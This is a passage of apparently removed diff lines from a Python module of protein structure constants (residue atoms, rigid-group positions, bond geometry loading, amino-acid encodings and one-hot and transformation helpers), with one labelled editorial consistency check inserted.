'pre-omega-group', (empty) -# 2: 'phi-group', (currently empty, because it defines only hydrogens) -# 3: 'psi-group', -# 4,5,6,7: 'chi1,2,3,4-group' -# The atom positions are relative to the axis-end-atom of the corresponding -# rotation axis. The x-axis is in direction of the rotation axis, and the y-axis -# is defined such that the dihedral-angle-definiting atom (the last entry in -# chi_angles_atoms above) is in the xy-plane (with a positive y-coordinate). 
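# --- Editor's illustrative aside (not part of the original file) ---------------
# `chi_angles_atoms` and `chi_angles_mask` above encode the same information in
# two forms; this quick consistency check (using the 20-residue order taken from
# the mask's inline comments) confirms the mask has a 1 for every chi dihedral
# listed per residue.
_restypes_3 = ["ALA", "ARG", "ASN", "ASP", "CYS", "GLN", "GLU", "GLY", "HIS", "ILE",
               "LEU", "LYS", "MET", "PHE", "PRO", "SER", "THR", "TRP", "TYR", "VAL"]
for _resname, _mask in zip(_restypes_3, chi_angles_mask):
    assert len(chi_angles_atoms[_resname]) == int(sum(_mask)), _resname
# ------------------------------------------------------------------------------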
-# format: [atomname, group_idx, rel_position] -rigid_group_atom_positions: Dict[str, List[Tuple[str, int, Tuple[float, float, float]]]] = { - "ALA": [ - ("N", 0, (-0.525, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.529, -0.774, -1.205)), - ("O", 3, (0.627, 1.062, 0.000)), - ], - "ARG": [ - ("N", 0, (-0.524, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.524, -0.778, -1.209)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG", 4, (0.616, 1.390, -0.000)), - ("CD", 5, (0.564, 1.414, 0.000)), - ("NE", 6, (0.539, 1.357, -0.000)), - ("NH1", 7, (0.206, 2.301, 0.000)), - ("NH2", 7, (2.078, 0.978, -0.000)), - ("CZ", 7, (0.758, 1.093, -0.000)), - ], - "ASN": [ - ("N", 0, (-0.536, 1.357, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.531, -0.787, -1.200)), - ("O", 3, (0.625, 1.062, 0.000)), - ("CG", 4, (0.584, 1.399, 0.000)), - ("ND2", 5, (0.593, -1.188, 0.001)), - ("OD1", 5, (0.633, 1.059, 0.000)), - ], - "ASP": [ - ("N", 0, (-0.525, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, 0.000, -0.000)), - ("CB", 0, (-0.526, -0.778, -1.208)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.593, 1.398, -0.000)), - ("OD1", 5, (0.610, 1.091, 0.000)), - ("OD2", 5, (0.592, -1.101, -0.003)), - ], - "CYS": [ - ("N", 0, (-0.522, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, 0.000, 0.000)), - ("CB", 0, (-0.519, -0.773, -1.212)), - ("O", 3, (0.625, 1.062, -0.000)), - ("SG", 4, (0.728, 1.653, 0.000)), - ], - "GLN": [ - ("N", 0, (-0.526, 1.361, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, 0.000)), - ("CB", 0, (-0.525, -0.779, -1.207)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.615, 1.393, 0.000)), - ("CD", 5, (0.587, 1.399, -0.000)), - ("NE2", 6, (0.593, -1.189, -0.001)), - ("OE1", 6, (0.634, 1.060, 0.000)), - ], - "GLU": [ - ("N", 0, (-0.528, 1.361, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.526, -0.781, -1.207)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG", 4, (0.615, 1.392, 0.000)), - ("CD", 5, (0.600, 1.397, 0.000)), - ("OE1", 6, (0.607, 1.095, -0.000)), - ("OE2", 6, (0.589, -1.104, -0.001)), - ], - "GLY": [ - ("N", 0, (-0.572, 1.337, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.517, -0.000, -0.000)), - ("O", 3, (0.626, 1.062, -0.000)), - ], - "HIS": [ - ("N", 0, (-0.527, 1.360, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, 0.000, 0.000)), - ("CB", 0, (-0.525, -0.778, -1.208)), - ("O", 3, (0.625, 1.063, 0.000)), - ("CG", 4, (0.600, 1.370, -0.000)), - ("CD2", 5, (0.889, -1.021, 0.003)), - ("ND1", 5, (0.744, 1.160, -0.000)), - ("CE1", 5, (2.030, 0.851, 0.002)), - ("NE2", 5, (2.145, -0.466, 0.004)), - ], - "ILE": [ - ("N", 0, (-0.493, 1.373, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, -0.000)), - ("CB", 0, (-0.536, -0.793, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG1", 4, (0.534, 1.437, -0.000)), - ("CG2", 4, (0.540, -0.785, -1.199)), - ("CD1", 5, (0.619, 1.391, 0.000)), - ], - "LEU": [ - ("N", 0, (-0.520, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.522, -0.773, -1.214)), - ("O", 3, (0.625, 1.063, -0.000)), - ("CG", 4, (0.678, 1.371, 0.000)), - ("CD1", 5, (0.530, 1.430, -0.000)), - ("CD2", 5, (0.535, -0.774, 1.200)), - ], - "LYS": [ - ("N", 0, (-0.526, 1.362, -0.000)), - ("CA", 0, 
(0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, 0.000)), - ("CB", 0, (-0.524, -0.778, -1.208)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.619, 1.390, 0.000)), - ("CD", 5, (0.559, 1.417, 0.000)), - ("CE", 6, (0.560, 1.416, 0.000)), - ("NZ", 7, (0.554, 1.387, 0.000)), - ], - "MET": [ - ("N", 0, (-0.521, 1.364, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, 0.000, 0.000)), - ("CB", 0, (-0.523, -0.776, -1.210)), - ("O", 3, (0.625, 1.062, -0.000)), - ("CG", 4, (0.613, 1.391, -0.000)), - ("SD", 5, (0.703, 1.695, 0.000)), - ("CE", 6, (0.320, 1.786, -0.000)), - ], - "PHE": [ - ("N", 0, (-0.518, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, 0.000, -0.000)), - ("CB", 0, (-0.525, -0.776, -1.212)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.607, 1.377, 0.000)), - ("CD1", 5, (0.709, 1.195, -0.000)), - ("CD2", 5, (0.706, -1.196, 0.000)), - ("CE1", 5, (2.102, 1.198, -0.000)), - ("CE2", 5, (2.098, -1.201, -0.000)), - ("CZ", 5, (2.794, -0.003, -0.001)), - ], - "PRO": [ - ("N", 0, (-0.566, 1.351, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, 0.000)), - ("CB", 0, (-0.546, -0.611, -1.293)), - ("O", 3, (0.621, 1.066, 0.000)), - ("CG", 4, (0.382, 1.445, 0.0)), - # ('CD', 5, (0.427, 1.440, 0.0)), - ("CD", 5, (0.477, 1.424, 0.0)), # manually made angle 2 degrees larger - ], - "SER": [ - ("N", 0, (-0.529, 1.360, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.518, -0.777, -1.211)), - ("O", 3, (0.626, 1.062, -0.000)), - ("OG", 4, (0.503, 1.325, 0.000)), - ], - "THR": [ - ("N", 0, (-0.517, 1.364, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, -0.000)), - ("CB", 0, (-0.516, -0.793, -1.215)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG2", 4, (0.550, -0.718, -1.228)), - ("OG1", 4, (0.472, 1.353, 0.000)), - ], - "TRP": [ - ("N", 0, (-0.521, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, 0.000)), - ("CB", 0, (-0.523, -0.776, -1.212)), - ("O", 3, (0.627, 1.062, 0.000)), - ("CG", 4, (0.609, 1.370, -0.000)), - ("CD1", 5, (0.824, 1.091, 0.000)), - ("CD2", 5, (0.854, -1.148, -0.005)), - ("CE2", 5, (2.186, -0.678, -0.007)), - ("CE3", 5, (0.622, -2.530, -0.007)), - ("NE1", 5, (2.140, 0.690, -0.004)), - ("CH2", 5, (3.028, -2.890, -0.013)), - ("CZ2", 5, (3.283, -1.543, -0.011)), - ("CZ3", 5, (1.715, -3.389, -0.011)), - ], - "TYR": [ - ("N", 0, (-0.522, 1.362, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, -0.000, -0.000)), - ("CB", 0, (-0.522, -0.776, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG", 4, (0.607, 1.382, -0.000)), - ("CD1", 5, (0.716, 1.195, -0.000)), - ("CD2", 5, (0.713, -1.194, -0.001)), - ("CE1", 5, (2.107, 1.200, -0.002)), - ("CE2", 5, (2.104, -1.201, -0.003)), - ("OH", 5, (4.168, -0.002, -0.005)), - ("CZ", 5, (2.791, -0.001, -0.003)), - ], - "VAL": [ - ("N", 0, (-0.494, 1.373, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, -0.000)), - ("CB", 0, (-0.533, -0.795, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG1", 4, (0.540, 1.429, -0.000)), - ("CG2", 4, (0.533, -0.776, 1.203)), - ], -} - -# A list of atoms (excluding hydrogen) for each AA type. PDB naming convention. 
-residue_atoms: Dict[str, List[str]] = { - "ALA": ["C", "CA", "CB", "N", "O"], - "ARG": ["C", "CA", "CB", "CG", "CD", "CZ", "N", "NE", "O", "NH1", "NH2"], - "ASP": ["C", "CA", "CB", "CG", "N", "O", "OD1", "OD2"], - "ASN": ["C", "CA", "CB", "CG", "N", "ND2", "O", "OD1"], - "CYS": ["C", "CA", "CB", "N", "O", "SG"], - "GLU": ["C", "CA", "CB", "CG", "CD", "N", "O", "OE1", "OE2"], - "GLN": ["C", "CA", "CB", "CG", "CD", "N", "NE2", "O", "OE1"], - "GLY": ["C", "CA", "N", "O"], - "HIS": ["C", "CA", "CB", "CG", "CD2", "CE1", "N", "ND1", "NE2", "O"], - "ILE": ["C", "CA", "CB", "CG1", "CG2", "CD1", "N", "O"], - "LEU": ["C", "CA", "CB", "CG", "CD1", "CD2", "N", "O"], - "LYS": ["C", "CA", "CB", "CG", "CD", "CE", "N", "NZ", "O"], - "MET": ["C", "CA", "CB", "CG", "CE", "N", "O", "SD"], - "PHE": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "N", "O"], - "PRO": ["C", "CA", "CB", "CG", "CD", "N", "O"], - "SER": ["C", "CA", "CB", "N", "O", "OG"], - "THR": ["C", "CA", "CB", "CG2", "N", "O", "OG1"], - "TRP": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE2", "CE3", "CZ2", "CZ3", "CH2", "N", "NE1", "O"], - "TYR": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "N", "O", "OH"], - "VAL": ["C", "CA", "CB", "CG1", "CG2", "N", "O"], -} - -# Naming swaps for ambiguous atom names. -# Due to symmetries in the amino acids the naming of atoms is ambiguous in -# 4 of the 20 amino acids. -# (The LDDT paper lists 7 amino acids as ambiguous, but the naming ambiguities -# in LEU, VAL and ARG can be resolved by using the 3d constellations of -# the 'ambiguous' atoms and their neighbours) -# TODO: ^ interpret this -residue_atom_renaming_swaps: Dict[str, Dict[str, str]] = { - "ASP": {"OD1": "OD2"}, - "GLU": {"OE1": "OE2"}, - "PHE": {"CD1": "CD2", "CE1": "CE2"}, - "TYR": {"CD1": "CD2", "CE1": "CE2"}, -} - -# Van der Waals radii [Angstroem] of the atoms (from Wikipedia) -van_der_waals_radius: Dict[str, float] = { - "C": 1.7, - "N": 1.55, - "O": 1.52, - "S": 1.8, -} - -Bond = collections.namedtuple("Bond", ["atom1_name", "atom2_name", "length", "stddev"]) -BondAngle = collections.namedtuple( - "BondAngle", - ["atom1_name", "atom2_name", "atom3name", "angle_rad", "stddev"], -) - - -def map_structure_with_atom_order(in_list: list, first_call: bool = True) -> list: - # Maps strings in a nested list structure to their corresponding index in atom_order - if first_call: - in_list = copy.deepcopy(in_list) - for i in range(len(in_list)): - if isinstance(in_list[i], list): - in_list[i] = map_structure_with_atom_order(in_list[i], first_call=False) - elif isinstance(in_list[i], str): - in_list[i] = atom_order[in_list[i]] - else: - raise ValueError("Unexpected type when mapping nested lists!") - return in_list - - -@functools.lru_cache(maxsize=None) -def load_stereo_chemical_props() -> ( - Tuple[ - Mapping[str, List[Bond]], - Mapping[str, List[Bond]], - Mapping[str, List[BondAngle]], - ] -): - """Load stereo_chemical_props.txt into a nice structure. - - Load literature values for bond lengths and bond angles and translate bond angles into the length of the opposite - edge of the triangle ("residue_virtual_bonds"). 
- - Returns: - residue_bonds: dict that maps resname --> list of Bond tuples residue_virtual_bonds: dict that maps resname --> - list of Bond tuples residue_bond_angles: dict that maps resname --> list of BondAngle tuples - """ - # TODO: this file should be downloaded in a setup script - stereo_chemical_props = resources.read_text("openfold.resources", "stereo_chemical_props.txt") - - lines_iter = iter(stereo_chemical_props.splitlines()) - # Load bond lengths. - residue_bonds: Dict[str, List[Bond]] = {} - next(lines_iter) # Skip header line. - for line in lines_iter: - if line.strip() == "-": - break - bond, resname, bond_length, stddev = line.split() - atom1, atom2 = bond.split("-") - if resname not in residue_bonds: - residue_bonds[resname] = [] - residue_bonds[resname].append(Bond(atom1, atom2, float(bond_length), float(stddev))) - residue_bonds["UNK"] = [] - - # Load bond angles. - residue_bond_angles: Dict[str, List[BondAngle]] = {} - next(lines_iter) # Skip empty line. - next(lines_iter) # Skip header line. - for line in lines_iter: - if line.strip() == "-": - break - bond, resname, angle_degree, stddev_degree = line.split() - atom1, atom2, atom3 = bond.split("-") - if resname not in residue_bond_angles: - residue_bond_angles[resname] = [] - residue_bond_angles[resname].append( - BondAngle( - atom1, - atom2, - atom3, - float(angle_degree) / 180.0 * np.pi, - float(stddev_degree) / 180.0 * np.pi, - ) - ) - residue_bond_angles["UNK"] = [] - - def make_bond_key(atom1_name: str, atom2_name: str) -> str: - """Unique key to lookup bonds.""" - return "-".join(sorted([atom1_name, atom2_name])) - - # Translate bond angles into distances ("virtual bonds"). - residue_virtual_bonds: Dict[str, List[Bond]] = {} - for resname, bond_angles in residue_bond_angles.items(): - # Create a fast lookup dict for bond lengths. - bond_cache: Dict[str, Bond] = {} - for b in residue_bonds[resname]: - bond_cache[make_bond_key(b.atom1_name, b.atom2_name)] = b - residue_virtual_bonds[resname] = [] - for ba in bond_angles: - bond1 = bond_cache[make_bond_key(ba.atom1_name, ba.atom2_name)] - bond2 = bond_cache[make_bond_key(ba.atom2_name, ba.atom3name)] - - # Compute distance between atom1 and atom3 using the law of cosines - # c^2 = a^2 + b^2 - 2ab*cos(gamma). - gamma = ba.angle_rad - length = np.sqrt(bond1.length**2 + bond2.length**2 - 2 * bond1.length * bond2.length * np.cos(gamma)) - - # Propagation of uncertainty assuming uncorrelated errors. - dl_outer = 0.5 / length - dl_dgamma = (2 * bond1.length * bond2.length * np.sin(gamma)) * dl_outer - dl_db1 = (2 * bond1.length - 2 * bond2.length * np.cos(gamma)) * dl_outer - dl_db2 = (2 * bond2.length - 2 * bond1.length * np.cos(gamma)) * dl_outer - stddev = np.sqrt( - (dl_dgamma * ba.stddev) ** 2 + (dl_db1 * bond1.stddev) ** 2 + (dl_db2 * bond2.stddev) ** 2 - ) - residue_virtual_bonds[resname].append(Bond(ba.atom1_name, ba.atom3name, length, stddev)) - - return (residue_bonds, residue_virtual_bonds, residue_bond_angles) - - -# Between-residue bond lengths for general bonds (first element) and for Proline -# (second element). -between_res_bond_length_c_n: Tuple[float, float] = (1.329, 1.341) -between_res_bond_length_stddev_c_n: Tuple[float, float] = (0.014, 0.016) - -# Between-residue cos_angles. 
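The virtual-bond conversion above is just the law of cosines: two bond lengths a and b sharing the middle atom, together with the angle gamma between them, fix the 1-3 distance c via c^2 = a^2 + b^2 - 2ab*cos(gamma). A self-contained sketch with typical backbone-like numbers chosen purely for illustration (not values read from stereo_chemical_props.txt):

```python
import numpy as np

def virtual_bond_length(a: float, b: float, gamma_rad: float) -> float:
    """1-3 distance of a 1-2-3 angle: c^2 = a^2 + b^2 - 2*a*b*cos(gamma)."""
    return float(np.sqrt(a ** 2 + b ** 2 - 2.0 * a * b * np.cos(gamma_rad)))

# Illustrative values only: N-CA ~ 1.459 A, CA-C ~ 1.525 A, N-CA-C ~ 111 degrees.
print(round(virtual_bond_length(1.459, 1.525, np.deg2rad(111.0)), 3))  # ~ 2.46 A
```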
-between_res_cos_angles_c_n_ca: Tuple[float, float] = (-0.5203, 0.0353) # degrees: 121.352 +- 2.315 -between_res_cos_angles_ca_c_n: Tuple[float, float] = (-0.4473, 0.0311) # degrees: 116.568 +- 1.995 - -# This mapping is used when we need to store atom data in a format that requires -# fixed atom data size for every residue (e.g. a numpy array). -atom_types: List[str] = [ - "N", - "CA", - "C", - "CB", - "O", - "CG", - "CG1", - "CG2", - "OG", - "OG1", - "SG", - "CD", - "CD1", - "CD2", - "ND1", - "ND2", - "OD1", - "OD2", - "SD", - "CE", - "CE1", - "CE2", - "CE3", - "NE", - "NE1", - "NE2", - "OE1", - "OE2", - "CH2", - "NH1", - "NH2", - "OH", - "CZ", - "CZ2", - "CZ3", - "NZ", - "OXT", -] -atom_order: Dict[str, int] = {atom_type: i for i, atom_type in enumerate(atom_types)} -atom_type_num = len(atom_types) # := 37. - -# A compact atom encoding with 14 columns -# pylint: disable=line-too-long -# pylint: disable=bad-whitespace -restype_name_to_atom14_names: Dict[str, List[str]] = { - "ALA": ["N", "CA", "C", "O", "CB", "", "", "", "", "", "", "", "", ""], - "ARG": ["N", "CA", "C", "O", "CB", "CG", "CD", "NE", "CZ", "NH1", "NH2", "", "", ""], - "ASN": ["N", "CA", "C", "O", "CB", "CG", "OD1", "ND2", "", "", "", "", "", ""], - "ASP": ["N", "CA", "C", "O", "CB", "CG", "OD1", "OD2", "", "", "", "", "", ""], - "CYS": ["N", "CA", "C", "O", "CB", "SG", "", "", "", "", "", "", "", ""], - "GLN": ["N", "CA", "C", "O", "CB", "CG", "CD", "OE1", "NE2", "", "", "", "", ""], - "GLU": ["N", "CA", "C", "O", "CB", "CG", "CD", "OE1", "OE2", "", "", "", "", ""], - "GLY": ["N", "CA", "C", "O", "", "", "", "", "", "", "", "", "", ""], - "HIS": ["N", "CA", "C", "O", "CB", "CG", "ND1", "CD2", "CE1", "NE2", "", "", "", ""], - "ILE": ["N", "CA", "C", "O", "CB", "CG1", "CG2", "CD1", "", "", "", "", "", ""], - "LEU": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "", "", "", "", "", ""], - "LYS": ["N", "CA", "C", "O", "CB", "CG", "CD", "CE", "NZ", "", "", "", "", ""], - "MET": ["N", "CA", "C", "O", "CB", "CG", "SD", "CE", "", "", "", "", "", ""], - "PHE": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "", "", ""], - "PRO": ["N", "CA", "C", "O", "CB", "CG", "CD", "", "", "", "", "", "", ""], - "SER": ["N", "CA", "C", "O", "CB", "OG", "", "", "", "", "", "", "", ""], - "THR": ["N", "CA", "C", "O", "CB", "OG1", "CG2", "", "", "", "", "", "", ""], - "TRP": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "NE1", "CE2", "CE3", "CZ2", "CZ3", "CH2"], - "TYR": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "OH", "", ""], - "VAL": ["N", "CA", "C", "O", "CB", "CG1", "CG2", "", "", "", "", "", "", ""], - "UNK": ["", "", "", "", "", "", "", "", "", "", "", "", "", ""], -} -# pylint: enable=line-too-long -# pylint: enable=bad-whitespace - - -# This is the standard residue order when coding AA type as a number. -# Reproduce it by taking 3-letter AA codes and sorting them alphabetically. -restypes: List[str] = [ - "A", - "R", - "N", - "D", - "C", - "Q", - "E", - "G", - "H", - "I", - "L", - "K", - "M", - "F", - "P", - "S", - "T", - "W", - "Y", - "V", -] -restype_order: Dict[str, int] = {restype: i for i, restype in enumerate(restypes)} -restype_num = len(restypes) # := 20. -unk_restype_index = restype_num # Catch-all index for unknown restypes. 
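As a quick usage sketch (not part of the original module): the residue tables above are typically consumed by mapping a one-letter sequence to integer residue types, with anything outside the 20 standard residues routed to the catch-all unknown index.

```python
# Rebuilds the same 20-residue ordering as `restypes` above, purely for illustration.
restypes = ["A", "R", "N", "D", "C", "Q", "E", "G", "H", "I",
            "L", "K", "M", "F", "P", "S", "T", "W", "Y", "V"]
restype_order = {r: i for i, r in enumerate(restypes)}
unk_restype_index = len(restypes)  # 20, the catch-all index

def encode_aatype(sequence: str) -> list:
    """Encode a protein sequence; letters outside the 20 standard types map to 20."""
    return [restype_order.get(aa, unk_restype_index) for aa in sequence.upper()]

print(encode_aatype("ARNDB"))  # -> [0, 1, 2, 3, 20]  ('B' is not a standard residue type)
```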
- -restypes_with_x: List[str] = restypes + ["X"] -restype_order_with_x: Dict[str, int] = {restype: i for i, restype in enumerate(restypes_with_x)} - - -def sequence_to_onehot(sequence: str, mapping: Mapping[str, int], map_unknown_to_x: bool = False) -> np.ndarray: - """Maps the given sequence into a one-hot encoded matrix. - - Args: - sequence: An amino acid sequence. - mapping: A dictionary mapping amino acids to integers. - map_unknown_to_x: If True, any amino acid that is not in the mapping will be - mapped to the unknown amino acid 'X'. If the mapping doesn't contain amino acid 'X', an error will be thrown. - If False, any amino acid not in the mapping will throw an error. - - Returns: - A numpy array of shape (seq_len, num_unique_aas) with one-hot encoding of the sequence. - - Raises: - ValueError: If the mapping doesn't contain values from 0 to - num_unique_aas - 1 without any gaps. - """ - num_entries = max(mapping.values()) + 1 - - if sorted(set(mapping.values())) != list(range(num_entries)): - raise ValueError( - "The mapping must have values from 0 to num_unique_aas-1 without any gaps. Got: %s" - % sorted(mapping.values()) - ) - - one_hot_arr = np.zeros((len(sequence), num_entries), dtype=np.int32) - - for aa_index, aa_type in enumerate(sequence): - if map_unknown_to_x: - if aa_type.isalpha() and aa_type.isupper(): - aa_id = mapping.get(aa_type, mapping["X"]) - else: - raise ValueError(f"Invalid character in the sequence: {aa_type}") - else: - aa_id = mapping[aa_type] - one_hot_arr[aa_index, aa_id] = 1 - - return one_hot_arr - - -restype_1to3: Dict[str, str] = { - "A": "ALA", - "R": "ARG", - "N": "ASN", - "D": "ASP", - "C": "CYS", - "Q": "GLN", - "E": "GLU", - "G": "GLY", - "H": "HIS", - "I": "ILE", - "L": "LEU", - "K": "LYS", - "M": "MET", - "F": "PHE", - "P": "PRO", - "S": "SER", - "T": "THR", - "W": "TRP", - "Y": "TYR", - "V": "VAL", -} - - -# NB: restype_3to1 differs from Bio.PDB.protein_letters_3to1 by being a simple -# 1-to-1 mapping of 3 letter names to one letter names. The latter contains -# many more, and less common, three letter names as keys and maps many of these -# to the same one letter name (including 'X' and 'U' which we don't use here). -restype_3to1: Dict[str, str] = {v: k for k, v in restype_1to3.items()} - -# Define a restype name for all unknown residues. -unk_restype = "UNK" - -resnames: List[str] = [restype_1to3[r] for r in restypes] + [unk_restype] -resname_to_idx: Dict[str, int] = {resname: i for i, resname in enumerate(resnames)} - - -# The mapping here uses hhblits convention, so that B is mapped to D, J and O -# are mapped to X, U is mapped to C, and Z is mapped to E. Other than that the -# remaining 20 amino acids are kept in alphabetical order. -# There are 2 non-amino acid codes, X (representing any amino acid) and -# "-" representing a missing amino acid in an alignment. The id for these -# codes is put at the end (20 and 21) so that they can easily be ignored if -# desired. -HHBLITS_AA_TO_ID: Dict[str, int] = { - "A": 0, - "B": 2, - "C": 1, - "D": 2, - "E": 3, - "F": 4, - "G": 5, - "H": 6, - "I": 7, - "J": 20, - "K": 8, - "L": 9, - "M": 10, - "N": 11, - "O": 20, - "P": 12, - "Q": 13, - "R": 14, - "S": 15, - "T": 16, - "U": 1, - "V": 17, - "W": 18, - "X": 20, - "Y": 19, - "Z": 3, - "-": 21, -} - -# Partial inversion of HHBLITS_AA_TO_ID. -ID_TO_HHBLITS_AA: Dict[int, str] = { - 0: "A", - 1: "C", # Also U. - 2: "D", # Also B. - 3: "E", # Also Z. 
- 4: "F", - 5: "G", - 6: "H", - 7: "I", - 8: "K", - 9: "L", - 10: "M", - 11: "N", - 12: "P", - 13: "Q", - 14: "R", - 15: "S", - 16: "T", - 17: "V", - 18: "W", - 19: "Y", - 20: "X", # Includes J and O. - 21: "-", -} - -restypes_with_x_and_gap: List[str] = restypes + ["X", "-"] -MAP_HHBLITS_AATYPE_TO_OUR_AATYPE: Tuple[int, ...] = tuple( - restypes_with_x_and_gap.index(ID_TO_HHBLITS_AA[i]) for i in range(len(restypes_with_x_and_gap)) -) - - -def _make_standard_atom_mask() -> np.ndarray: - """Returns [num_res_types, num_atom_types] mask array.""" - # +1 to account for unknown (all 0s). - mask = np.zeros([restype_num + 1, atom_type_num], dtype=np.int32) - for restype, restype_letter in enumerate(restypes): - restype_name = restype_1to3[restype_letter] - atom_names = residue_atoms[restype_name] - for atom_name in atom_names: - atom_type = atom_order[atom_name] - mask[restype, atom_type] = 1 - return mask - - -STANDARD_ATOM_MASK = _make_standard_atom_mask() - - -# A one hot representation for the first and second atoms defining the axis -# of rotation for each chi-angle in each residue. -def chi_angle_atom(atom_index: int) -> np.ndarray: - """Define chi-angle rigid groups via one-hot representations.""" - chi_angles_index = {} - one_hots = [] - - for k, v in chi_angles_atoms.items(): - indices = [atom_types.index(s[atom_index]) for s in v] - indices.extend([-1] * (4 - len(indices))) - chi_angles_index[k] = indices - - for r in restypes: - res3 = restype_1to3[r] - one_hot = np.eye(atom_type_num)[chi_angles_index[res3]] - one_hots.append(one_hot) - - one_hots.append(np.zeros([4, atom_type_num])) # Add zeros for residue `X`. - one_hot = np.stack(one_hots, axis=0) - one_hot = np.transpose(one_hot, [0, 2, 1]) - - return one_hot - - -chi_atom_1_one_hot = chi_angle_atom(1) -chi_atom_2_one_hot = chi_angle_atom(2) - -# An array like chi_angles_atoms but using indices rather than names. -chi_angles_atom_indices_list: List[List[List[str]]] = [chi_angles_atoms[restype_1to3[r]] for r in restypes] -chi_angles_atom_indices_ours: list = map_structure_with_atom_order(chi_angles_atom_indices_list) -chi_angles_atom_indices = np.array( - [chi_atoms + ([[0, 0, 0, 0]] * (4 - len(chi_atoms))) for chi_atoms in chi_angles_atom_indices_list] -) - -# Mapping from (res_name, atom_name) pairs to the atom's chi group index -# and atom index within that group. -chi_groups_for_atom: Dict[Tuple[str, str], List[Tuple[int, int]]] = collections.defaultdict(list) -for res_name, chi_angle_atoms_for_res in chi_angles_atoms.items(): - for chi_group_i, chi_group in enumerate(chi_angle_atoms_for_res): - for atom_i, atom in enumerate(chi_group): - chi_groups_for_atom[(res_name, atom)].append((chi_group_i, atom_i)) -chi_groups_for_atom = dict(chi_groups_for_atom) - - -def _make_rigid_transformation_4x4(ex: np.ndarray, ey: np.ndarray, translation: np.ndarray) -> np.ndarray: - """Create a rigid 4x4 transformation matrix from two axes and transl.""" - # Normalize ex. 
- ex_normalized = ex / np.linalg.norm(ex) - - # make ey perpendicular to ex - ey_normalized = ey - np.dot(ey, ex_normalized) * ex_normalized - ey_normalized /= np.linalg.norm(ey_normalized) - - # compute ez as cross product - eznorm = np.cross(ex_normalized, ey_normalized) - m = np.stack([ex_normalized, ey_normalized, eznorm, translation]).transpose() - m = np.concatenate([m, [[0.0, 0.0, 0.0, 1.0]]], axis=0) - return m - - -# create an array with (restype, atomtype) --> rigid_group_idx -# and an array with (restype, atomtype, coord) for the atom positions -# and compute affine transformation matrices (4,4) from one rigid group to the -# previous group -restype_atom37_to_rigid_group = np.zeros([21, 37], dtype=int) -restype_atom37_mask = np.zeros([21, 37], dtype=np.float32) -restype_atom37_rigid_group_positions = np.zeros([21, 37, 3], dtype=np.float32) -restype_atom14_to_rigid_group = np.zeros([21, 14], dtype=int) -restype_atom14_mask = np.zeros([21, 14], dtype=np.float32) -restype_atom14_rigid_group_positions = np.zeros([21, 14, 3], dtype=np.float32) -restype_rigid_group_default_frame = np.zeros([21, 8, 4, 4], dtype=np.float32) - - -def _make_rigid_group_constants() -> None: - """Fill the arrays above.""" - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - for atomname, group_idx, atom_position in rigid_group_atom_positions[resname]: - atomtype = atom_order[atomname] - restype_atom37_to_rigid_group[restype, atomtype] = group_idx - restype_atom37_mask[restype, atomtype] = 1 - restype_atom37_rigid_group_positions[restype, atomtype, :] = atom_position - - atom14idx = restype_name_to_atom14_names[resname].index(atomname) - restype_atom14_to_rigid_group[restype, atom14idx] = group_idx - restype_atom14_mask[restype, atom14idx] = 1 - restype_atom14_rigid_group_positions[restype, atom14idx, :] = atom_position - - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - atom_positions: Dict[str, np.ndarray] = { - name: np.array(pos) for name, _, pos in rigid_group_atom_positions[resname] - } - - # backbone to backbone is the identity transform - 